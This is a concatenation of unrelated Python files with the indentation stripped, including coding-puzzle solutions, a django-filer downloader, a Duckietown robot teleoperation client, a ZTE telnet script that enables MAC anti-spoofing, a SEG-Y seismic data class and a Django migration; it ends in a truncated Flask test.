if recipeName not in recipeTypeDict:
print("please provide recipeType from this list: ", recipeTypeDict)
sys.exit(1)
recipeFunc = recipeTypeDict[recipeName]
recipeFunc(sys.argv[2:])
|
# https://www.hackerrank.com/challenges/piling-up
from collections import deque
def stackable(cubes):
if not cubes:
return 'No'
elif len(cubes) == 1:
return 'Yes'
else:
stack = [max(cubes.pop(), cubes.popleft())]
while len(cubes) > 1:
right_most = cubes.pop()
left_most = cubes.popleft()
picked_cube = max(left_most, right_most)
if picked_cube <= stack[-1]:
stack.append(picked_cube)
else:
return 'No'
if not cubes:
return 'Yes'
else:
if cubes[0] <= stack[-1]:
stack.append(cubes[0])
return 'Yes'
else:
return 'No'
T = int(input().strip())
for _ in range(T):
n = int(input().strip())
cubes = deque(map(int, input().strip().split()))
print(stackable(cubes))
# not using deque, imperative version:
T = int(input().strip())
for _ in range(T):
n = int(input().strip())
cubes = tuple(map(int, input().strip().split()))
i = 0
while i < n - 1 and cubes[i] >= cubes[i + 1]:
i += 1
while i < n - 1 and cubes[i] <= cubes[i + 1]:
i += 1
if i == n - 1:
print('Yes')
else:
print('No')
'''
FUNCTIONAL (BUT SLOW) VERSION:
To change while loop to functional version, use recursion.
def func(my_list, z):
if z == len(my_list):
return something
else:
# do something else
return func(my_list, z+1)
In this version, we use tail-call recursion
(Which might be best if Python support tail-call optimization).
To know more about tail-call optimization in Python,
read this 'What have we gained?' in this document:
http://blog.moertel.com/posts/2013-05-11-recursive-to-iterative.html
'''
def test_then_change_arg(tracking_arg, change_func, test_func,
*args, **kwargs):
if test_func(tracking_arg, *args, **kwargs):
return test_then_change_arg(change_func(tracking_arg),
change_func, test_func,
*args, **kwargs)
else:
return tracking_arg
def add_one(arg):
return arg + 1
def stackable(cubes):
i = 0
n = len(cubes)
def test_one(k, cubes, n):
return k < n - 1 and cubes[k] >= cubes[k + 1]
def test_two(k, cubes, n):
return k < n - 1 and cubes[k] <= cubes[k + 1]
j = test_then_change_arg(i, add_one, test_one, cubes, n)
m = test_then_change_arg(j, add_one, test_two, cubes, n)
if m == n - 1:
return 'Yes'
else:
return 'No'
T = int(input().strip())
for _ in range(T):
n = int(input().strip())
cubes = tuple(map(int, input().strip().split()))
print(stackable(cubes))
|
import os
from tempfile import NamedTemporaryFile
import requests
from filer.models.filemodels import File
from filer.models.imagemodels import Image
from django.core.files import File as BaseFile
IMAGE_TYPES = ("jpg", "jpeg", "png", "tiff", "tif", "gif")
def url_to_filer(url, folder=None, headers=None):
if any([url.strip().lower().endswith(it) for it in IMAGE_TYPES]):
cls_ = Image
else:
cls_ = File
name = url.rsplit("/", 1)[-1]
try:
inst = cls_.objects.filter(name__exact=name).first()
inst.file._require_file()
assert b"DOCTYPE HTML" not in inst.file.read(100)
return inst
except Exception:
pass
with NamedTemporaryFile() as tempfile:
with requests.get(url, headers=headers, stream=True) as img_res:
for chunk in img_res.iter_content(chunk_size=1024):
tempfile.write(chunk)
tempfile.flush()
doc_ = cls_.objects.create(folder=folder, name=name)
doc_.file.save(doc_.name, BaseFile(tempfile))
doc_.file_data_changed()
doc_.save()
return doc_
def local_file_filer(path, folder=None, headers=None):
assert os.path.exists(path)
with open(path, "rb") as basefile:
if path.lower().rsplit(".", 1)[-1] in IMAGE_TYPES:
cls_ = Image
else:
cls_ = File
doc_ = cls_.objects.create(folder=folder, name=path.rsplit("/", 1)[-1])
doc_.file.save(doc_.name, BaseFile(basefile))
doc_.file_data_changed()
doc_.save()
return doc_
|
import tkinter
import numpy as np
from PIL import ImageTk, Image
from duckietown_slimremote.helpers import random_id
from duckietown_slimremote.networking import make_push_socket, construct_action
from duckietown_slimremote.pc.camera import SubCameraMaster
class RemoteRobot():
def __init__(self, host):
self.host = host
self.id = random_id()
self.ping_msg = construct_action(self.id)
self.robot_sock = make_push_socket(host)
self.robot_sock.send_string(self.ping_msg)
self.cam = SubCameraMaster(host)
def step(self, action, with_observation=True):
assert len(action) == 2 or len(action) == 5
msg = construct_action(self.id, action=action)
# run action on robot
self.robot_sock.send_string(msg)
print("sent action:",msg)
# return last known camera image #FIXME: this must be non-blocking and re-send ping if necessary
if with_observation:
return self.cam.get_img_blocking()
else:
return None
def observe(self):
return self.cam.get_img_blocking()
def reset(self):
# This purposefully doesn't do anything on the real robot (other than halt).
# But in sim this obviously resets the simulation
return self.step([0, 0])
class KeyboardControlledRobot():
def __init__(self, host):
self.robot = RemoteRobot(host)
self.rootwindow = tkinter.Tk()
self.history = []
frame = tkinter.Frame(self.rootwindow, width=1, height=1)
frame.bind("<KeyPress>", self.keydown)
frame.bind("<KeyRelease>", self.keyup)
frame.pack()
# Creates a Tkinter-compatible photo image, which can be used everywhere Tkinter expects an image object.
im = Image.fromarray(np.zeros((160,120,3),dtype=np.uint8))
self.img = ImageTk.PhotoImage(im)
self.panel = tkinter.Label(self.rootwindow, image=self.img)
# The Pack geometry manager packs widgets in rows or columns.
self.panel.pack(side="bottom", fill="both", expand="yes")
frame.focus_set()
self.rootwindow.after(200, self.updateImg)
self.rootwindow.mainloop()
def updateImg(self):
self.rootwindow.after(200, self.updateImg)
obs = self.robot.observe()
img2 = ImageTk.PhotoImage(Image.fromarray(obs))
self.panel.configure(image=img2)
self.panel.image = img2
return
def keyup(self, e):
if e.keycode in self.history:
self.history.pop(self.history.index(e.keycode))
self.moveRobot()
def moveRobot(self):
action = self.keysToAction()
_ = self.robot.step(action, with_observation=False)
def keydown(self, e):
if not e.keycode in self.history:
self.history.append(e.keycode)
self.moveRobot()
def keysToAction(self):
action = np.array([0,0])
if 8320768 in self.history and 8189699 in self.history: # UP/RIGHT
action = np.array([.3, .9])
elif 8320768 in self.history and 8124162 in self.history: # UP/LEFT
action = np.array([.9, .3])
elif 8255233 in self.history and 8189699 in self.history: # DOWN/RIGHT
action = np.array([-.3, -.9])
elif 8255233 in self.history and 8124162 in self.history: # DOWN/LEFT
action = np.array([-.9, -.3])
elif 8320768 in self.history: # UP
action = np.array([.9,.9])
elif 8189699 in self.history: # RIGHT
action = np.array([-.7,.7])
elif 8255233 in self.history: # DOWN
action = np.array([-.8,-.8])
elif 8124162 in self.history: # LEFT
action = np.array([.7,-.7])
return action
|
c = float(input('Informe a temperatura em C: '))
f = ((9*c)/5)+32
print(f'A temperatura de {c}ºC corresponde a {f}ºF!')
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import pexpect
import re
import os
def zte_telnet(ip, username='', passwd=''):
"""TODO: Docstring for zte_telnet.
:ip: TODO
:username: TODO
:passwd: TODO
:returns: TODO
"""
child = pexpect.spawn("telnet %s" % ip)
fout = file('1.log', 'w')
child.logfile = fout
try:
child.expect("[uU]sername:")
child.sendline(username)
child.expect("[pP]assword:")
child.sendline(passwd)
child.expect(".*#")
except (pexpect.EOF, pexpect.TIMEOUT):
print "%s:telnet fail" % ip
child.close(force=True)
return None
return child
def mac(record):
"""TODO: Docstring for mac.
:record: TODO
:returns: TODO
"""
try:
ip = record.split(',')[0].strip()
child = zte_telnet(ip)
if child is None:
return 'fail'
else:
child.sendline('conf t')
child.expect('#')
child.sendline('security mac-spoofing-trap enable')
child.expect('#')
child.sendline('security mac-anti-spoofing enable')
child.expect('#')
child.sendline('exit')
child.expect('#')
child.sendline('exit')
child.close()
return 'success'
except (pexpect.EOF, pexpect.TIMEOUT):
child.close(force=True)
return 'fail'
def zte_mac_anti(olts='zte.txt'):
result_file = 'result/zte.log'
if os.path.exists(result_file):
os.remove(result_file)
os.mknod(result_file)
with open(olts) as folts:
for x in folts:
print x
mark = mac(x)
if mark == 'success':
with open(result_file, 'a') as fresult:
fresult.write('%s:success\n' % x.strip())
else:
with open(result_file, 'a') as fresult:
fresult.write('%s:fail\n' % x.strip())
|
from itertools import permutations
def solution(babbling):
kind = []
for i in range(1, 5):
kind.extend([''.join(j) for j in list(permutations(["aya", "ye", "woo", "ma"], i))])
answer = 0
for i in babbling:
if i in kind:
answer += 1
return answer |
""" SEG-Y geometry. """
import os
from itertools import product
import numpy as np
import pandas as pd
import h5pickle as h5py
import segyio
import cv2
from .base import SeismicGeometry
from ..utils import find_min_max, lru_cache, SafeIO
from ...batchflow import Notifier
class SeismicGeometrySEGY(SeismicGeometry):
""" Class to infer information about SEG-Y cubes and provide convenient methods of working with them.
A wrapper around `segyio` to provide higher-level API.
In order to initialize instance, one must supply `path`, `headers` and `index`:
- `path` is a location of SEG-Y file
- `headers` is a sequence of trace headers to infer from the file
- `index_headers` is a subset of `headers` that is used as trace (unique) identifier:
for example, `INLINE_3D` and `CROSSLINE_3D` has a one-to-one correspondance with trace numbers.
Another example is `FieldRecord` and `TraceNumber`.
Default values of `headers` and `index_headers` are ones for post-stack seismic
(with correctly filled `INLINE_3D` and `CROSSLINE_3D` headers),
so that post-stack cube can be loaded by providing path only.
Each instance is basically built around `dataframe` attribute, which describes mapping from
indexing headers to trace numbers. It is used to, for example, get all trace indices from a desired `FieldRecord`.
`set_index` method can be called to change indexing headers of the dataframe.
One can add stats to the instance by calling `collect_stats` method, that makes a full pass through
the cube in order to analyze distribution of amplitudes. It also collects a number of trace examples
into `trace_container` attribute, that can be used for later evaluation of various statistics.
"""
#pylint: disable=attribute-defined-outside-init, too-many-instance-attributes, redefined-builtin
def __init__(self, path, headers=None, index_headers=None, **kwargs):
self.structured = False
self.quantized = False
self.dataframe = None
self.segyfile = None
self.headers = headers or self.HEADERS_POST_FULL
self.index_headers = index_headers or self.INDEX_POST
super().__init__(path, **kwargs)
def set_index(self, index_headers, sortby=None):
""" Change current index to a subset of loaded headers. """
self.dataframe.reset_index(inplace=True)
if sortby:
self.dataframe.sort_values(index_headers, inplace=True, kind='mergesort')# the only stable sorting algorithm
self.dataframe.set_index(index_headers, inplace=True)
self.index_headers = index_headers
self.add_attributes()
# Methods of inferring dataframe and amplitude stats
def process(self, collect_stats=True, recollect=False, **kwargs):
""" Create dataframe based on `segy` file headers. """
# Note that all the `segyio` structure inference is disabled
self.segyfile = SafeIO(self.path, opener=segyio.open, mode='r', strict=False, ignore_geometry=True)
self.segyfile.mmap()
self.depth = len(self.segyfile.trace[0])
self.delay = self.segyfile.header[0].get(segyio.TraceField.DelayRecordingTime)
self.sample_rate = segyio.dt(self.segyfile) / 1000
# Load all the headers
dataframe = {}
for column in self.headers:
dataframe[column] = self.segyfile.attributes(getattr(segyio.TraceField, column))[slice(None)]
dataframe = pd.DataFrame(dataframe)
dataframe.reset_index(inplace=True)
dataframe.rename(columns={'index': 'trace_index'}, inplace=True)
self.dataframe = dataframe.set_index(self.index_headers)
self.add_attributes()
# Collect stats, if needed and not collected previously
if os.path.exists(self.path_meta) and not recollect:
self.load_meta()
self.has_stats = True
elif collect_stats:
self.collect_stats(**kwargs)
# Create a matrix with ones at fully-zero traces
if self.index_headers == self.INDEX_POST and not hasattr(self, 'zero_traces'):
try:
size = self.depth // 10
slc = np.stack([self[:, :, i * size] for i in range(1, 10)], axis=0)
self.zero_traces = np.zeros(self.lens, dtype=np.int32)
self.zero_traces[np.std(slc, axis=0) == 0] = 1
except (ValueError, AttributeError): # can't reshape
pass
# Store additional segy info
self.segy_path = self.path
self.segy_text = [self.segyfile.text[i] for i in range(1 + self.segyfile.ext_headers)]
# Computed from CDP_X/CDP_Y information
try:
self.rotation_matrix = self.compute_rotation_matrix()
self.area = self.compute_area()
except (ValueError, KeyError): # single line SEG-Y
self.rotation_matrix = None
self.area = -1.
def add_attributes(self):
""" Infer info about curent index from `dataframe` attribute. """
self.index_len = len(self.index_headers)
self._zero_trace = np.zeros(self.depth)
# Unique values in each of the indexing column
self.unsorted_uniques = [np.unique(self.dataframe.index.get_level_values(i).values)
for i in range(self.index_len)]
self.uniques = [np.sort(item) for item in self.unsorted_uniques]
self.uniques_inversed = [{v: j for j, v in enumerate(self.uniques[i])}
for i in range(self.index_len)]
self.byte_no = [getattr(segyio.TraceField, h) for h in self.index_headers]
self.offsets = [np.min(item) for item in self.uniques]
self.lens = [len(item) for item in self.uniques]
self.ranges = [(np.min(item), np.max(item)) for item in self.uniques]
self.cube_shape = np.asarray([*self.lens, self.depth])
def _get_store_key(self, traceseqno):
""" get trace lateral coordinates from header """
header = self.segyfile.header[traceseqno]
# i -> id in a dataframe
keys = [header.get(field) for field in self.byte_no]
store_key = tuple(self.uniques_inversed[j][item] for j, item in enumerate(keys))
return store_key
def collect_stats(self, spatial=True, bins=25, num_keep=10000, pbar=True, **kwargs):
""" Pass through file data to collect stats:
- min/max values.
- a number of quantiles of values in the cube.
- certain amount of traces are stored in a `trace_container` attribute.
If `spatial` is True, makes an additional pass through the cube to obtain following:
- min/max/mean/std for every trace - `min_matrix`, `max_matrix` and so on.
- histogram of values for each trace: - `hist_matrix`.
- bins for histogram creation: - `bins`.
Parameters
----------
spatial : bool
Whether to collect additional stats.
bins : int or str
Number of bins or name of automatic algorithm of defining number of bins.
num_keep : int
Number of traces to store.
"""
#pylint: disable=not-an-iterable
_ = kwargs
num_traces = len(self.segyfile.header)
num_keep = min(num_keep, num_traces // 10) or 1
frequency = num_traces // num_keep
# Get min/max values, store some of the traces
trace_container = []
value_min, value_max = np.inf, -np.inf
min_matrix, max_matrix = np.full(self.lens, np.nan), np.full(self.lens, np.nan)
for i in Notifier(pbar, desc='Finding min/max')(range(num_traces)):
trace = self.segyfile.trace[i]
store_key = self._get_store_key(i)
trace_min, trace_max = find_min_max(trace)
min_matrix[store_key] = trace_min
max_matrix[store_key] = trace_max
if i % frequency == 0 and trace_min != trace_max:
trace_container.extend(trace.tolist())
#TODO: add dtype for storing
# Store everything into instance
self.min_matrix, self.max_matrix = min_matrix, max_matrix
self.zero_traces = (min_matrix == max_matrix).astype(np.int)
self.zero_traces[np.isnan(min_matrix)] = 1
value_min = np.nanmin(min_matrix)
value_max = np.nanmax(max_matrix)
# Collect more spatial stats: min, max, mean, std, histograms matrices
if spatial:
# Make bins
bins = np.histogram_bin_edges(None, bins, range=(value_min, value_max)).astype(np.float)
self.bins = bins
# Create containers
hist_matrix = np.full((*self.lens, len(bins)-1), np.nan)
# Iterate over traces
for i in Notifier(pbar, desc=f'Collecting stats for {self.displayed_name}')(range(num_traces)):
trace = self.segyfile.trace[i]
store_key = self._get_store_key(i)
# For each trace, we store an entire histogram of amplitudes
val_min, val_max = find_min_max(trace)
if val_min != val_max:
histogram = np.histogram(trace, bins=bins)[0]
hist_matrix[store_key] = histogram
# Restore stats from histogram
midpoints = (bins[1:] + bins[:-1]) / 2
probs = hist_matrix / np.sum(hist_matrix, axis=-1, keepdims=True)
mean_matrix = np.sum(probs * midpoints, axis=-1)
std_matrix = np.sqrt(np.sum((np.broadcast_to(midpoints, (*mean_matrix.shape, len(midpoints))) - \
mean_matrix.reshape(*mean_matrix.shape, 1))**2 * probs,
axis=-1))
# Store everything into instance
self.mean_matrix, self.std_matrix = mean_matrix, std_matrix
self.hist_matrix = hist_matrix
self.trace_container = np.array(trace_container)
self.v_uniques = len(np.unique(trace_container))
self.v_min, self.v_max = value_min, value_max
self.v_mean, self.v_std = np.mean(trace_container), np.std(trace_container)
self.v_q001, self.v_q01, self.v_q05 = np.quantile(trace_container, [0.001, 0.01, 0.05])
self.v_q999, self.v_q99, self.v_q95 = np.quantile(trace_container, [0.999, 0.99, 0.95])
self.has_stats = True
self.store_meta()
# Compute stats from CDP/LINES correspondence
def compute_rotation_matrix(self):
""" Compute transform from INLINE/CROSSLINE coordinates to CDP system. """
ix_points = []
cdp_points = []
for _ in range(3):
idx = np.random.randint(len(self.dataframe))
trace = self.segyfile.header[idx]
# INLINE_3D -> CDP_X, CROSSLINE_3D -> CDP_Y
ix = (trace[segyio.TraceField.INLINE_3D], trace[segyio.TraceField.CROSSLINE_3D])
cdp = (trace[segyio.TraceField.CDP_X], trace[segyio.TraceField.CDP_Y])
ix_points.append(ix)
cdp_points.append(cdp)
rotation_matrix = cv2.getAffineTransform(np.float32(ix_points), np.float32(cdp_points))
return rotation_matrix
def compute_area(self, correct=True, shift=50):
""" Compute approximate area of the cube in square kilometres.
Parameters
----------
correct : bool
Whether to correct computed area for zero traces.
"""
i = self.ilines[self.ilines_len // 2]
x = self.xlines[self.xlines_len // 2]
# Central trace coordinates
idx = self.dataframe['trace_index'][(i, x)]
trace = self.segyfile.header[idx]
cdp_x, cdp_y = (trace[segyio.TraceField.CDP_X], trace[segyio.TraceField.CDP_Y])
# Two shifted traces
idx_dx = self.dataframe['trace_index'][(i, x + shift)]
trace_dx = self.segyfile.header[idx_dx]
cdp_x_delta = abs(trace_dx[segyio.TraceField.CDP_X] - cdp_x)
idx_dy = self.dataframe['trace_index'][(i + shift, x)]
trace_dy = self.segyfile.header[idx_dy]
cdp_y_delta = abs(trace_dy[segyio.TraceField.CDP_Y] - cdp_y)
# Traces if CDP_X/CDP_Y coordinate system is rotated on 90 degrees with respect to ILINES/CROSSLINES
if cdp_x_delta == 0 and cdp_y_delta == 0:
idx_dx = self.dataframe['trace_index'][(i + shift, x)]
trace_dx = self.segyfile.header[idx_dx]
cdp_x_delta = abs(trace_dx[segyio.TraceField.CDP_X] - cdp_x)
idx_dy = self.dataframe['trace_index'][(i, x + shift)]
trace_dy = self.segyfile.header[idx_dy]
cdp_y_delta = abs(trace_dy[segyio.TraceField.CDP_Y] - cdp_y)
cdp_x_delta /= shift
cdp_y_delta /= shift
ilines_km = cdp_y_delta * self.ilines_len / 1000
xlines_km = cdp_x_delta * self.xlines_len / 1000
area = ilines_km * xlines_km
if correct and hasattr(self, 'zero_traces'):
area -= (cdp_x_delta / 1000) * (cdp_y_delta / 1000) * np.sum(self.zero_traces)
return round(area, 2)
# Methods to load actual data from SEG-Y
# 1D
def load_trace(self, index):
""" Load individual trace from segyfile.
If passed `np.nan`, returns trace of zeros.
"""
# TODO: can be improved by creating buffer and writing directly to it
if not np.isnan(index):
return self.segyfile.trace.raw[int(index)]
return self._zero_trace
def load_traces(self, trace_indices):
""" Stack multiple traces together. """
# TODO: can be improved by preallocating memory and passing it as a buffer to `load_trace`
return np.stack([self.load_trace(idx) for idx in trace_indices])
# 2D
@lru_cache(128, attributes='index_headers')
def load_slide(self, loc=None, axis=0, start=None, end=None, step=1, stable=True):
""" Create indices and load actual traces for one slide.
If the current index is 1D, then slide is defined by `start`, `end`, `step`.
If the current index is 2D, then slide is defined by `loc` and `axis`.
Parameters
----------
loc : int
Number of slide to load.
axis : int
Number of axis to load slide along.
start, end, step : ints
Parameters of slice loading for 1D index.
stable : bool
Whether or not to use the same sorting order as in the segyfile.
"""
if axis in [0, 1]:
indices = self.make_slide_indices(loc=loc, start=start, end=end, step=step, axis=axis, stable=stable)
slide = self.load_traces(indices)
elif axis == 2:
slide = self.segyfile.depth_slice[loc]
if slide.shape[0] == np.prod(self.lens):
slide = slide.reshape(self.lens)
else:
buffer = np.zeros_like(self.zero_traces, dtype=np.float32)
buffer[self.zero_traces == 0] = slide
slide = buffer
return slide
def make_slide_indices(self, loc=None, axis=0, start=None, end=None, step=1, stable=True, return_iterator=False):
""" Choose appropriate version of index creation, depending on length of the current index.
Parameters
----------
start, end, step : ints
Parameters of slice loading for 1d index.
stable : bool
Whether or not to use the same sorting order as in the segyfile.
return_iterator : bool
Whether to also return the same iterator that is used to index current `dataframe`.
Can be useful for subsequent loads from the same place in various instances.
"""
if self.index_len == 1:
_ = loc, axis
result = self.make_slide_indices_1d(start=start, end=end, step=step, stable=stable,
return_iterator=return_iterator)
elif self.index_len == 2:
_ = start, end, step
result = self.make_slide_indices_2d(loc=loc, axis=axis, stable=stable,
return_iterator=return_iterator)
elif self.index_len == 3:
raise NotImplementedError('Yet to be done!')
else:
raise ValueError('Index lenght must be less than 4. ')
return result
def make_slide_indices_1d(self, start=None, end=None, step=1, stable=True, return_iterator=False):
""" 1D version of index creation. """
start = start or self.offsets[0]
end = end or self.uniques[0][-1]
if stable:
iterator = self.dataframe.index[(self.dataframe.index >= start) & (self.dataframe.index <= end)]
iterator = iterator.values[::step]
else:
iterator = np.arange(start, end+1, step)
indices = self.dataframe['trace_index'].reindex(iterator, fill_value=np.nan).values
if return_iterator:
return indices, iterator
return indices
def make_slide_indices_2d(self, loc, axis=0, stable=True, return_iterator=False):
""" 2D version of index creation. """
other_axis = 1 - axis
location = self.uniques[axis][loc]
if stable:
others = self.dataframe[self.dataframe.index.get_level_values(axis) == location]
others = others.index.get_level_values(other_axis).values
else:
others = self.uniques[other_axis]
iterator = list(zip([location] * len(others), others) if axis == 0 else zip(others, [location] * len(others)))
indices = self.dataframe['trace_index'].reindex(iterator, fill_value=np.nan).values
#TODO: keep only uniques, when needed, with `nan` filtering
if stable:
indices = np.unique(indices)
if return_iterator:
return indices, iterator
return indices
# 3D
def _load_crop(self, locations):
""" Load 3D crop from the cube.
Parameters
----------
locations : sequence of slices
List of desired slices to load: along the first index, the second, and depth.
Example
-------
If the current index is `INLINE_3D` and `CROSSLINE_3D`, then to load
5:110 ilines, 100:1105 crosslines, 0:700 depths, locations must be::
[slice(5, 110), slice(100, 1105), slice(0, 700)]
"""
shape = np.array([((slc.stop or stop) - (slc.start or 0)) for slc, stop in zip(locations, self.cube_shape)])
indices = self.make_crop_indices(locations)
crop = self.load_traces(indices)[..., locations[-1]].reshape(shape)
return crop
def make_crop_indices(self, locations):
""" Create indices for 3D crop loading. """
iterator = list(product(*[[self.uniques[idx][i] for i in range(locations[idx].start, locations[idx].stop)]
for idx in range(2)]))
indices = self.dataframe['trace_index'].reindex(iterator, fill_value=np.nan).values
_, unique_ind = np.unique(indices, return_index=True)
return indices[np.sort(unique_ind, kind='stable')]
def load_crop(self, locations, threshold=15, mode='adaptive', **kwargs):
""" Smart choice between using :meth:`._load_crop` and stacking multiple slides created by :meth:`.load_slide`.
Parameters
----------
mode : str
If `adaptive`, then function to load is chosen automatically.
If `slide` or `crop`, then uses that function to load data.
threshold : int
Upper bound for amount of slides to load. Used only in `adaptive` mode.
"""
_ = kwargs
shape = np.array([((slc.stop or stop) - (slc.start or 0)) for slc, stop in zip(locations, self.cube_shape)])
axis = np.argmin(shape)
if mode == 'adaptive':
if axis in [0, 1]:
mode = 'slide' if min(shape) < threshold else 'crop'
else:
flag = np.prod(shape[:2]) / np.prod(self.cube_shape[:2])
mode = 'slide' if flag > 0.1 else 'crop'
if mode == 'slide':
slc = locations[axis]
if axis == 0:
return np.stack([self.load_slide(loc, axis=axis)[locations[1], locations[2]]
for loc in range(slc.start, slc.stop)], axis=axis)
if axis == 1:
return np.stack([self.load_slide(loc, axis=axis)[locations[0], locations[2]]
for loc in range(slc.start, slc.stop)], axis=axis)
if axis == 2:
return np.stack([self.load_slide(loc, axis=axis)[locations[0], locations[1]]
for loc in range(slc.start, slc.stop)], axis=axis)
return self._load_crop(locations)
# Quantization
def compute_quantization_parameters(self, ranges='q99', clip=True, center=False):
""" Make bins for int8 quantization and convert value-stats.
Parameters
----------
ranges : str or sequence of two numbers
Ranges to quantize data to. Available options are:
- `q95`, `q99`, `q999` to clip data to respective quantiles.
- `same` keep the same range of data.
clip : bool
Whether to clip data to selected ranges.
center : bool
Whether to make data have 0-mean before quantization.
"""
ranges_dict = {
'q95': min(abs(self.v_q05), abs(self.v_q95)),
'q99': min(abs(self.v_q01), abs(self.v_q99)),
'q999': min(abs(self.v_q001), abs(self.v_q999)),
'same': max(abs(self.v_min), abs(self.v_max)),
}
if ranges in ranges_dict:
ranges = ranges_dict[ranges]
ranges = (-ranges, +ranges)
if center:
ranges = tuple(item - self.v_mean for item in ranges)
self.qnt_ranges = ranges
self.qnt_bins = np.histogram_bin_edges(None, bins=254, range=ranges).astype(np.float)
self.qnt_clip = clip
self.qnt_center = center
# Compute quantized statistics
quantized_tc = self.quantize(self.trace_container)
self.qnt_min, self.qnt_max = self.quantize(self.v_min), self.quantize(self.v_max)
self.qnt_mean, self.qnt_std = np.mean(quantized_tc), np.std(quantized_tc)
self.qnt_q001, self.qnt_q01, self.qnt_q05 = np.quantile(quantized_tc, [0.001, 0.01, 0.05])
self.qnt_q999, self.qnt_q99, self.qnt_q95 = np.quantile(quantized_tc, [0.999, 0.99, 0.95])
# Estimate difference after quantization
quantized_tc += 127
restored_tc = self.qnt_bins[quantized_tc]
self.qnt_error = np.mean(np.abs(restored_tc - self.trace_container)) / self.v_std
def quantize(self, array):
""" Convert array of floats to int8 values. """
if self.qnt_center:
array -= self.v_mean
if self.qnt_clip:
array = np.clip(array, *self.qnt_ranges)
array = np.digitize(array, self.qnt_bins) - 128
return array.astype(np.int8)
# Convert SEG-Y
def convert(self, format='blosc', path=None, postfix='', projections='ixh',
quantize=True, ranges='q99', clip=True, center=False, store_meta=True, pbar=True, **kwargs):
""" Convert SEG-Y file to a more effective storage.
Parameters
----------
format : {'hdf5', 'qhdf5', 'blosc', 'qblosc}
Format of storage to convert to: `blosc` takes less space, but a touch slower, than `hdf5`.
Prefix `q` sets the `quantize` parameter to True.
path : str
If provided, then path to save file to.
Otherwise, file is saved under the same name with different extension.
postfix : str
Optional string to add before extension. Used only if the `path` is not provided.
projections : str
Which projections of data to store: `i` for iline one, `x` for the crossline, `h` for depth.
quantize : bool
Whether to binarize data to `int8` dtype. `ranges`, `clip` and `center` define parameters of quantization.
Binarization is done uniformly over selected `ranges` of values.
If True, then `q` is appended to extension.
ranges : str
Ranges to quantize data to. Available options are:
- `q95`, `q99`, `q999` to clip data to respective quantiles.
- `same` keep the same range of data.
clip : bool
Whether to clip data to selected ranges.
center : bool
Whether to make data have 0-mean before quantization.
store_meta : bool
Whether to store meta near the save file.
pbar : bool
Whether to show progress bar during conversion.
kwargs : dict
Other parameters, passed directly to the file constructor of chosen format.
If format is `blosc`:
- `cname` for algorithm of compression. Default is `lz4hc`.
- `clevel` for level of compression. Default is 6.
- `shuffle` for bitshuffle during compression. Default is False.
"""
#pylint: disable=import-outside-toplevel
# Select format
if format.startswith('q'):
quantize = True
format = format[1:]
from .converted import SeismicGeometryConverted
if format == 'blosc':
from .blosc import BloscFile
constructor, mode = BloscFile, 'w'
elif format == 'hdf5':
constructor, mode = h5py.File, 'w-'
# Quantization
if quantize:
self.compute_quantization_parameters(ranges=ranges, clip=clip, center=center)
dtype, transform = np.int8, self.quantize
else:
dtype, transform = np.float32, lambda array: array
if path is None:
fmt_prefix = 'q' if quantize else ''
if postfix == '' and len(projections) < 3:
postfix = '_' + projections
path = os.path.join(os.path.dirname(self.path), f'{self.short_name}{postfix}.{fmt_prefix}{format}')
# Remove file, if exists
if os.path.exists(path):
os.remove(path)
# Create file and datasets inside
with constructor(path, mode=mode, **kwargs) as file:
total = (('i' in projections) * self.cube_shape[0] +
('x' in projections) * self.cube_shape[1] +
('h' in projections) * self.cube_shape[2])
progress_bar = Notifier(pbar, total=total)
name = os.path.basename(path)
for p in projections:
axis = self.parse_axis(p)
cube_name = SeismicGeometryConverted.AXIS_TO_NAME[axis]
order = SeismicGeometryConverted.AXIS_TO_ORDER[axis]
cube = file.create_dataset(cube_name, shape=self.cube_shape[order], dtype=dtype)
progress_bar.set_description(f'Creating {name}; {p}-projection')
for idx in range(self.cube_shape[axis]):
slide = self.load_slide(idx, axis=axis, stable=False)
slide = slide.T if axis == 1 else slide
slide = transform(slide)
cube[idx, :, :] = slide
progress_bar.update()
progress_bar.close()
if store_meta:
if not self.has_stats:
self.collect_stats(pbar=pbar)
path_meta = os.path.splitext(path)[0] + '.meta'
self.store_meta(path_meta)
return SeismicGeometry(path)
def convert_to_hdf5(self, path=None, postfix='', projections='ixh',
quantize=True, ranges='q99', clip=True, center=False, store_meta=True, pbar=True, **kwargs):
""" Convenient alias for HDF5 conversion. """
kwargs_ = locals()
kwargs_.pop('self')
kwargs_.pop('kwargs')
return self.convert(format='hdf5', **kwargs_, **kwargs)
def convert_to_blosc(self, path=None, postfix='', projections='ixh',
quantize=True, ranges='q99', clip=True, center=False, store_meta=True, pbar=True, **kwargs):
""" Convenient alias for BLOSC conversion. """
kwargs_ = locals()
kwargs_.pop('self')
kwargs_.pop('kwargs')
return self.convert(format='blosc', **kwargs_, **kwargs)
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('basketball', '0001_initial'),
]
operations = [
migrations.RenameField(
model_name='game',
old_name='team1_team_rebounds',
new_name='team1_def_rebounds',
),
migrations.RenameField(
model_name='game',
old_name='team2_team_rebounds',
new_name='team1_off_rebounds',
),
migrations.AddField(
model_name='game',
name='team2_def_rebounds',
field=models.PositiveIntegerField(default=0),
),
migrations.AddField(
model_name='game',
name='team2_off_rebounds',
field=models.PositiveIntegerField(default=0),
),
migrations.AlterField(
model_name='playbyplay',
name='assist',
field=models.CharField(max_length=30, choices=[('ast', 'AST'), ('pot', 'POT')]),
),
migrations.AlterField(
model_name='playbyplay',
name='primary_play',
field=models.CharField(max_length=30, choices=[('fgm', 'FGM'), ('fga', 'FGA'), ('3pm', '3PM'), ('3pa', '3PA'), ('stl', 'STL'), ('blk', 'BLK'), ('to', 'TO')]),
),
migrations.AlterField(
model_name='playbyplay',
name='secondary_play',
field=models.CharField(blank=True, choices=[('dreb', 'DREB'), ('oreb', 'OREB'), ('ba', 'BA')], max_length=30),
),
]
|
t = int(input())
while(t>0):
n = int(input())
a = list(map(int,input().strip().split()))[:n]
b = list(map(int,input().strip().split()))[:n]
c = list(map(int,input().strip().split()))[:n]
p = []
p.append(a[0])
for i in range(0,len(a)-1):
if a[i] == a[i+1]:
continue
p.append(a[i+1])
p.append(b[0])
for j in range(0,len(b)-1):
if b[j] == b[j+1]:
continue
else:
p.append(b[j+1])
p.append(c[0])
for k in range(0,len(c)-1):
if c[k] == c[k+1]:
continue
else:
p.append(c[k+1])
print(p[:n])
t = t-1
|
from app import app
def test_status():
response = app.test_client().get('/')
assert response.status_code == 200
def test_contents():
